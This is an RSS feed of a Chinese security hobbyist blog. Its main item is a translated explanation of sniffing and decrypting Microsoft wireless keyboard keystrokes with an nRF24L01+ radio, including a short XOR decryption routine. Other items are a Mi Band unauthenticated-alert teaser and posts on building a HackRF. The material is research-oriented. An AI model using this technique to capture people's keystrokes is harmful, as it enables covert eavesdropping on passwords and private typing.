﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>BlogJava-酒水不犯茶水-随笔分类-黑客技术</title><link>http://www.blogjava.net/baicker/category/17624.html</link><description>&lt;style&gt;
BODY {SCROLLBAR-FACE-COLOR: #A8D8A3;SCROLLBAR-HIGHLIGHT-COLOR: #A8D8A3; SCROLLBAR-SHADOW-COLOR: #7BAC75;SCROLLBAR-3DLIGHT-COLOR: #7BAC75; SCROLLBAR-ARROW-COLOR: #7BAC75; SCROLLBAR-TRACK-COLOR: #C4E5C0;SCROLLBAR-DARKSHADOW-COLOR: #A8D8A3; SCROLLBAR-BASE-COLOR: #A8D8A3;COLOR: #000000; FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体"; FONT-SIZE: 11px; background:#cdf1d1}
TABLE {FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体"; FONT-SIZE: 11px;BORDER-COLLAPSE: collapse;border-top-width: 1px;border-right-width: 1px;border-bottom-width: 1px;border-left-width: 1px;border-top-style: solid;border-right-style: none;border-bottom-style: none;border-left-style: solid;border-top-color: #A3B67C;border-right-color: #A3B67C;border-bottom-color: #A3B67C;border-left-color: #A3B67C;}
.tr {FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体";FONT-SIZE: 11px;background-color: #B0F790;text-align: center;}
.td {FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体";FONT-SIZE: 11px;background-color: #c0e5c4;}
.warningColor {FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体";FONT-SIZE: 21px;color: #ff0000;}
input {BACKGROUND: #CDF1D1; BORDER-BOTTOM: #99D293 1px solid; BORDER-LEFT: #99D293 1px solid; BORDER-RIGHT: #99D293 1px solid; BORDER-TOP: #99D293 1px solid; COLOR: #000000; font-family: "微软雅黑,Arial,Verdana,arial,serif,宋体"; FONT-SIZE: 12px; HEIGHT: 18px; PADDING-BOTTOM: 1px; PADDING-LEFT: 1px; PADDING-RIGHT: 1px; PADDING-TOP: 1px; onMouseOut: this.style.backgroundColor='#287A07' onMouseOver=this.style.backgroundColor='#000000'}
.file{border:1px solid #99D293;color:#000000;background:#CDF1D1;font:normal 12px 微软雅黑,Arial,Verdana,arial,serif,宋体;height:18px}
textarea {BACKGROUND: #CDF1D1;FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体";BORDER-TOP-WIDTH: 1px;BORDER-LEFT-WIDTH: 1px;FONT-SIZE: 12px;BORDER-BOTTOM-WIDTH: 1px;BORDER-RIGHT-WIDTH: 1px;color: #000000;}
.text {BACKGROUND: #CDF1D1;FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体";BORDER-TOP-WIDTH: 1px;BORDER-LEFT-WIDTH: 1px;FONT-SIZE: 12px;BORDER-BOTTOM-WIDTH: 1px;BORDER-RIGHT-WIDTH: 1px;color: #000000;}
A:visited {FONT-SIZE: 9pt; COLOR: #808080; FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体"; TEXT-DECORATION: none;}
A:active {FONT-SIZE: 9pt; COLOR: #287A07; FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体"; TEXT-DECORATION: none;}
A:link {FONT-SIZE: 9pt; COLOR: #000000;FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体"; TEXT-DECORATION: none;}
A:hover {FONT-SIZE: 9pt; COLOR: #00D000; FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体"; TEXT-DECORATION: none;}
tr {FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体";font-size: 9pt;line-height: 18px;}
td {FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体";font-size: 9pt;border-top-width: 1px;border-right-width: 1px;border-bottom-width: 1px;border-left-width: 1px;border-top-style: none;border-right-style: solid;border-bottom-style: solid;border-left-style: none;border-top-color: #A3B67C;border-right-color: #A3B67C;border-bottom-color: #A3B67C;border-left-color: #A3B67C;}
.trHead {FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体";font-size: 9pt;background-color: #CDF1D1;line-height: 3px;}
.inputLogin {FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体";font-size: 9pt;border: 1px solid #A3B67C;background-color: #CDF1D1;vertical-align: bottom;}
.font-list {font-size: 9pt;color: #4DCD49;FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体";}
select {BACKGROUND: #CDF1D1;FONT-FAMILY: "微软雅黑,Arial,Verdana,arial,serif,宋体";BORDER-TOP-WIDTH: 1px;BORDER-LEFT-WIDTH: 1px;FONT-SIZE: 12px;BORDER-BOTTOM-WIDTH: 1px;BORDER-RIGHT-WIDTH: 1px;color: #000000;}
 .box{border:1px solid #C0C0C0;width:100%;height:19px;clip:rect(0px,181px,18px,0px);overflow:hidden;}
 .box2{border:1px solid #F4F4F4;width:100%;height:17px;clip:rect(0px,179px,16px,0px);overflow:hidden;}
&lt;/style&gt;
&lt;BR&gt;
叶的离去，是风的追求还是树的不挽留？
&lt;BR&gt;</description><language>zh-cn</language><lastBuildDate>Wed, 07 Oct 2015 17:39:07 GMT</lastBuildDate><pubDate>Wed, 07 Oct 2015 17:39:07 GMT</pubDate><ttl>60</ttl><item><title>小米手环分析</title><link>http://www.blogjava.net/baicker/archive/2015/09/05/427125.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Sat, 05 Sep 2015 10:34:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2015/09/05/427125.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/427125.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2015/09/05/427125.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/427125.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/427125.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>认证很简单，只需要在FF04的UUID中写入20字节的值并校验通过，就可以对手环进行读写指令控制。<br>其实有个更简单的，只要给Immediate Alert这个属性发送0x01或者0x02即可启动“女性娱乐模式”，不需要任何认证：<br>（这个属性本来是用来可穿戴设备的找回功能的）<br>...<br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2015/09/05/427125.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/427125.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2015-09-05 18:34 <a href="http://www.blogjava.net/baicker/archive/2015/09/05/427125.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>Sniffing Proprietary 2.4GHz Signals</title><link>http://www.blogjava.net/baicker/archive/2015/05/08/424624.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Fri, 08 May 2015 06:12:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2015/05/08/424624.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/424624.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2015/05/08/424624.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/424624.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/424624.html</trackback:ping><description><![CDATA[<h1>(U) Sniffing Proprietary 2.4GHz Signals</h1><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;"><span style="white-space: pre;">	</span>使用HackRF或者RTL-SDR加变频器，那是极好的，但是我最终需要把所有东西都打包到一个小空间里面。</p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;">可参考另一个页面：<a href="http://travisgoodspeed.blogspot.com/2011/02/promiscuity-is-nrf24l01s-duty.html" style="box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;">Travis Goodspeed</a>, 作者不仅嗅探了类似的键盘(Microsoft Comfort Desktop 5000), 还演示了怎么样<span style="line-height: 25.6000003814697px;">用他的一</span><span style="line-height: 25.6000003814697px;">个叫</span><a href="http://goodfet.sourceforge.net/" style="line-height: 25.6000003814697px; box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;">GoodFET</a><span style="line-height: 25.6000003814697px;">的设备和</span><span style="line-height: 25.6000003814697px;">python的脚本</span><a href="http://goodfet.sourceforge.net/clients/goodfetnrf/" style="line-height: 25.6000003814697px; box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;">goodfet.nrf</a>，<span style="line-height: 25.6000003814697px;">去</span><span style="line-height: 25.6000003814697px;">让 nRF24L01+ 芯片嗅探 2.4GHz 的数据</span><span style="line-height: 25.6000003814697px;">.</span></p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;"><a href="http://samy.pl/keysweeper/nrfgf2.jpg" style="box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;"><img src="https://camo.githubusercontent.com/d663dd3a9eda16f72f48b90aee6e7d34e43df893/687474703a2f2f73616d792e706c2f6b6579737765657065722f6e7266676632736d616c6c2e6a7067" alt="GoodFET and nRF24L01+" data-canonical-src="http://samy.pl/keysweeper/nrfgf2small.jpg" style="box-sizing: border-box; border: 0px; max-width: 100%;" /></a></p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;">Travis发现嗅探该设备存在多个难点，不仅现在需要指定频道（频率），而且还需要指定MAC地址。nRF芯片只提供发送到指定MAC地址的数据包。此外，nRF芯片不会发送MAC地址数据，因为你已经指定了 (在<code style="box-sizing: border-box; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6000003814697px; padding: 0.2em 0px; margin: 0px; border-radius: 3px; background-color: rgba(0, 0, 0, 0.0392157);">RX_ADDR_P[0-5]6个管道中的一个</code>)。</p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;"><span style="white-space: pre;">	</span>Travis发现在指定MAC长度的时候，<span style="line-height: 25.6000003814697px;">在手册中</span><span style="line-height: 25.6000003814697px;">为SETUP_AW，当设置为&#8216;0&#8217;的时候被认为是非法的，</span>&nbsp;</p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;"><span style="white-space: pre;">	</span>'00' - Illegal&nbsp;<br /><span style="line-height: 25.6000003814697px;"><span style="white-space: pre;">	</span>'01' - 3 bytes<br /><span style="white-space: pre;">	</span>'10' - 4 bytes&nbsp;<br /><span style="white-space: pre;">	</span>'11' &#8211; 5 bytes</span></p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;">但是实际设置MAC地址为两个字节，并且把MAC设置在preamble的位置(<code style="box-sizing: border-box; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6000003814697px; padding: 0.2em 0px; margin: 0px; border-radius: 3px; background-color: rgba(0, 0, 0, 0.0392157);">0x00AA or 0x0055, in binary 0000000010101010 or 0000000001010101</code>), 就能欺骗设备在数据部分首先提供完整的MAC地址给我们，请参考这篇碉堡了的<a href="http://travisgoodspeed.blogspot.com/2011/02/promiscuity-is-nrf24l01s-duty.html" style="box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;">文章</a>学习具体细节。</p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;"><a href="http://samy.pl/keysweeper/usb.jpg" style="box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;"><img src="https://camo.githubusercontent.com/520e1a92a00795840c07541a6498a8aa3877bcb6/687474703a2f2f73616d792e706c2f6b6579737765657065722f757362736d616c6c2e6a7067" alt="Microsoft USB Dongle" data-canonical-src="http://samy.pl/keysweeper/usbsmall.jpg" style="box-sizing: border-box; border: 0px; max-width: 100%;" /></a></p><hr style="box-sizing: content-box; height: 4px; margin: 16px 0px; overflow: hidden; border: 0px none; padding: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px; background: #e7e7e7;" /><h1><a id="user-content-u-increasing-speed-and-portability" href="https://github.com/samyk/keysweeper#u-increasing-speed-and-portability" aria-hidden="true" style="box-sizing: border-box; color: #4183c4; text-decoration: none; position: absolute; top: 0px; left: 0px; display: block; padding-right: 6px; padding-left: 30px; margin-left: -30px; line-height: 1; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;"></a>(U) Increasing Speed and Portability</h1><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;">&nbsp;&nbsp;&nbsp;&nbsp;虽然现在我们可以使用GoodFET，电脑加nRF24L01+来做嗅探测试，但是最终我们还是希望能够用一套便宜的嵌入式设备来实现此功能。我们可以使用Travis的研究成果，使用在微控制器+嵌入式C程序来实现所有功能。</p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;">另外，我们做了一些改进。 Goodfet.nrf 告诉我们怎样扫描我们想要监听的设备：</p><ul style="box-sizing: border-box; padding: 0px 0px 0px 2em; margin-top: 0px; margin-bottom: 16px; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;"><li style="box-sizing: border-box;">频率从 2400MHz开始</li><li style="box-sizing: border-box;">设置数据速率为 1Mbps 以及MAC为0x00AA，监听10秒钟</li><li style="box-sizing: border-box;"><span style="line-height: 25.6000003814697px;">设置数据速率为&nbsp;</span>2<span style="line-height: 25.6000003814697px;">Mbps 以及MAC为0x00AA，监听10秒钟</span></li><li style="box-sizing: border-box;"><span style="line-height: 25.6000003814697px;">设置数据速率为&nbsp;</span>1<span style="line-height: 25.6000003814697px;">Mbps 以及MAC为0x0055，监听10秒钟</span></li><li style="box-sizing: border-box;"><span style="line-height: 25.6000003814697px;">设置数据速率为&nbsp;</span>2<span style="line-height: 25.6000003814697px;">Mbps 以及MAC为0x0055，监听10秒钟</span></li><li style="box-sizing: border-box;">逐步增加频率值，直到2528MHz再返回从2400MHz开始循环 (128个频率值)</li><li style="box-sizing: border-box;">要找到一个潜在的键盘设备，我们需要至少四个包，以满足阈值确保是个合法的数据包，防止误报。</li></ul><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;">&nbsp;&nbsp;&nbsp;&nbsp;这意味着扫描一个完整的频率范围需要大约85分钟，(and at least several keystrokes must be pressed while we're sniffing within the correct 10 second period. ) 在仔细学习了Travis的研究，<a href="http://www.remote-exploit.org/articles/keykeriki_v2_0__8211_2_4ghz/" style="box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;">KeyKeriki</a>&nbsp;的项目，以及测试了我的键盘，我们可以做一些改进：</p><ul style="box-sizing: border-box; padding: 0px 0px 0px 2em; margin-top: 0px; margin-bottom: 16px; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;"><li style="box-sizing: border-box;">查阅 FCC，键盘只需要用到 2403 - 2480MHz的范围，直接从128个频率减少到了78个频率 (节省40%)</li><li style="box-sizing: border-box;">所有键盘使用2Mbps，又减少一半时间。</li><li style="box-sizing: border-box;">在检查了很多键盘之后，我发现所有的微软键盘的MAC地址都是以0xCD开始的，因此我们的preamble永远是<code style="line-height: 25.6000003814697px; box-sizing: border-box; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6000003814697px; padding: 0.2em 0px; margin: 0px; border-radius: 3px; background-color: rgba(0, 0, 0, 0.0392157);">0xAA (10101010)</code>&nbsp;，&nbsp;after inspecting more keyboards, I found that all Microsoft keyboards begin with 0xCD as the MAC, which tells us that our preamble will always be&nbsp;<code style="box-sizing: border-box; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6000003814697px; padding: 0.2em 0px; margin: 0px; border-radius: 3px; background-color: rgba(0, 0, 0, 0.0392157);">0xAA (10101010)</code>&nbsp;因为0xAA后面永远跟的是1 (<code style="box-sizing: border-box; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6000003814697px; padding: 0.2em 0px; margin: 0px; border-radius: 3px; background-color: rgba(0, 0, 0, 0.0392157);">0xCD 二进制 11001101</code>)以保持比特位交替，这样又加快了一倍的搜索速度。</li><li style="box-sizing: border-box;">因为我们知道MAC地址的第一位 (0xCD), 我们也知道需要什么样的数据包, 我们只需要检查某个确认的数据包，就能知道这是一个我们要找的键盘设备。</li><li style="box-sizing: border-box;">我们把每个频率扫描时间降低到500毫秒，从而把整个扫描一轮的时间降低到40秒。</li></ul><hr style="box-sizing: content-box; height: 4px; margin: 16px 0px; overflow: hidden; border: 0px none; padding: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px; background: #e7e7e7;" /><h1><a id="user-content-u-decrypting-keystrokes" href="https://github.com/samyk/keysweeper#u-decrypting-keystrokes" aria-hidden="true" style="box-sizing: border-box; color: #4183c4; text-decoration: none; position: absolute; top: 0px; left: 0px; display: block; padding-right: 6px; padding-left: 30px; margin-left: -30px; line-height: 1; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;"></a>(U) Decrypting Keystrokes</h1><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;">&nbsp;&nbsp;&nbsp;&nbsp;Thorsten Schr&#246;der 和 Max Moser 设计了一个碉堡了的东东&nbsp;<a href="http://www.remote-exploit.org/articles/keykeriki_v2_0__8211_2_4ghz/" style="box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;">KeyKeriki</a>, 能够监听微软键盘，完全逆向了解密的过程并且做了个设备能够完全实现这些。然而，他们的设备需要两个无线电和一个高端微处理器，来捕获和解析以2Mbps通信的键盘设备产生的数据。Travis的项目虽然牛逼，但是需要一台电脑主机，而且对于我们秘密执行任务，这套设备还是太大了，因此我们改进了设计，现在只需要一个廉价无线电和一个微处理器，功耗低而且体积小，不再需要电脑和其他无线电设备。</p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;">&nbsp;&nbsp;&nbsp;&nbsp;Thorsten 和 Max 发现这个击键只是使用<a href="http://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_.28ECB.29" style="line-height: 25.6000003814697px; box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;">ECB模式</a>简单的和<span style="line-height: 25.6000003814697px;">MAC地址异或加密&nbsp;</span><span style="line-height: 25.6000003814697px;">, 我们可以使用Travis的方法利用nRF24L01+来嗅探和获取MAC地址，这种加密方法相当于只是把扑克牌切了一次。</span></p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;">经过进一步调查发现，我们现在知道所有微软键盘的MAC地址都是以0xCD开始的，实际按键（下图橙色部分）恰好与MAC地址第一个字节对齐，这就是说即使我们不知道完整的MAC地址，我们依然能够解密按键消息，因为这个对齐是不会变的，MAC地址开头一个字节0xCD也是不变的。</p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;">由于数据包加密部分的长度是11个字节，而MAC地址占5个字节，CRC校验是每个字节做，异或（加密前），你会发现一些有意思的事情，由于MAC地址被异或了两次，我们能够在不需要知道完整MAC地址的情况下计算校验值，这是因为MAC被异或两次，就相当于什么都没做，而第11个字节又是MAC地址的第一个字节，我们知道是0xCD。根据这个特性我们可以进行一些其他的攻击，比如更改按键和CRC校验，同样不需要知道MAC地址，这将会在我以后的项目做相关演示。</p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;">&nbsp;KeyKeriki 项目中的一页演示了解密过程：</p><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;"><a href="https://camo.githubusercontent.com/e9f5cac1905b3bb1a0c37c2128a2ce31824bda13/687474703a2f2f73616d792e706c2f6b6579737765657065722f646563727970742e706e67" target="_blank" style="box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;"><img src="https://camo.githubusercontent.com/e9f5cac1905b3bb1a0c37c2128a2ce31824bda13/687474703a2f2f73616d792e706c2f6b6579737765657065722f646563727970742e706e67" alt="http://samy.pl/keysweeper/decrypt.png" data-canonical-src="http://samy.pl/keysweeper/decrypt.png" style="box-sizing: border-box; border: 0px; max-width: 100%;" /></a></p><ul style="box-sizing: border-box; padding: 0px 0px 0px 2em; margin-top: 0px; margin-bottom: 16px; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;"><li style="box-sizing: border-box;">Device type 0x0A = keyboard, 0x08 = mouse</li><li style="box-sizing: border-box;">Packet type 0x78 = keystroke, 0x38 = idle (key is held down)</li><li style="box-sizing: border-box;">Model type 0x06 = keyboard? This is the same HID code for a keyboard</li><li style="box-sizing: border-box;">HID code 0x05 = letter 'b' (described in section 7&nbsp;<a href="http://www.freebsddiary.org/APC/usb_hid_usages.php" style="box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;">here</a>)</li></ul><p style="margin-top: 0px; margin-bottom: 16px; box-sizing: border-box; color: #333333; font-family: 'Helvetica Neue', Helvetica, 'Segoe UI', Arial, freesans, sans-serif; font-size: 16px; line-height: 25.6000003814697px;">KeySweeper的解密部分代码:</p><pre style="box-sizing: border-box; overflow: auto; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6000003814697px; margin-top: 0px; margin-bottom: 16px; font-stretch: normal; line-height: 1.45; padding: 16px; border-radius: 3px; word-wrap: normal; color: #333333; background-color: #f7f7f7;"><code style="box-sizing: border-box; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6000003814697px; padding: 0px; margin: 0px; border-radius: 3px; word-break: normal; border: 0px; display: inline; max-width: initial; overflow: initial; line-height: inherit; word-wrap: normal; background: transparent;">// decrypt those keyboard packets! <br /> void decrypt(uint8_t* pkt) <br /> { <br /> &nbsp;&nbsp;&nbsp;&nbsp;// our encryption key is the 5-byte MAC address and <br /> &nbsp;&nbsp;&nbsp;&nbsp;// starts 4 bytes in (4-byte header is unencrypted)<br /> &nbsp;&nbsp;&nbsp;&nbsp; for (int i = 4; i &lt; 15; i++) <br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pkt[i] ^= mac &gt;&gt; (((i - 4) % 5) * 8) &amp; 0xFF; <br /> }</code></pre>原文：<span style="font-family: monospace; font-size: medium; line-height: normal; white-space: pre-wrap;"><a href="http://samy.pl/keysweeper/" target="_blank">KeySweeper</a></span><img src ="http://www.blogjava.net/baicker/aggbug/424624.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2015-05-08 14:12 <a href="http://www.blogjava.net/baicker/archive/2015/05/08/424624.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>打算做个HackRF</title><link>http://www.blogjava.net/baicker/archive/2014/03/31/411745.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Mon, 31 Mar 2014 09:52:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2014/03/31/411745.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/411745.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2014/03/31/411745.html#Feedback</comments><slash:comments>18</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/411745.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/411745.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>国外官方是300美元左右，目前买不到，国内有做的，卖2800人民币，买不起。只能自己做了，好几个芯片好贵啊，都上百了。<br><a id="viewpicture1_originalimage" href="/images/blogjava_net/baicker/HackRF/Case_With_HackRF.png" rel="lightbox[roadtrip]" title=""><img id="viewpicture1_galleryimage" src="/images/blogjava_net/baicker/HackRF/Case_With_HackRF.png" style="border-color: Black; border-width: 0px; height: 300px;" alt=""></a><br><br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2014/03/31/411745.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/411745.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2014-03-31 17:52 <a href="http://www.blogjava.net/baicker/archive/2014/03/31/411745.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>使用xgoldmon项目调试监控本机通信</title><link>http://www.blogjava.net/baicker/archive/2014/03/11/407353.html</link><dc:creator>009</dc:creator><author>009</author><pubDate>Tue, 11 Mar 2014 11:02:00 GMT</pubDate><guid>http://www.blogjava.net/baicker/archive/2014/03/11/407353.html</guid><wfw:comment>http://www.blogjava.net/baicker/comments/407353.html</wfw:comment><comments>http://www.blogjava.net/baicker/archive/2014/03/11/407353.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.blogjava.net/baicker/comments/commentRss/407353.html</wfw:commentRss><trackback:ping>http://www.blogjava.net/baicker/services/trackbacks/407353.html</trackback:ping><description><![CDATA[&nbsp;&nbsp;&nbsp;&nbsp; 摘要: <br>支持手机（感觉可以把手机设置成MODEM模式支持AT命令的应该都可以）<br>- Samsung Galaxy S3 GT-I9300 <br>- Samsung Galaxy Nexus GT-I9250 (has to be rooted!) <br>- Samsung Galaxy S2 GT-I9100<br>- Samsung Galaxy Note 2 GT-N7100<br>。。。。。。<br>&nbsp;&nbsp;<a href='http://www.blogjava.net/baicker/archive/2014/03/11/407353.html'>阅读全文</a><img src ="http://www.blogjava.net/baicker/aggbug/407353.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/baicker/" target="_blank">009</a> 2014-03-11 19:02 <a href="http://www.blogjava.net/baicker/archive/2014/03/11/407353.html#Feedback" 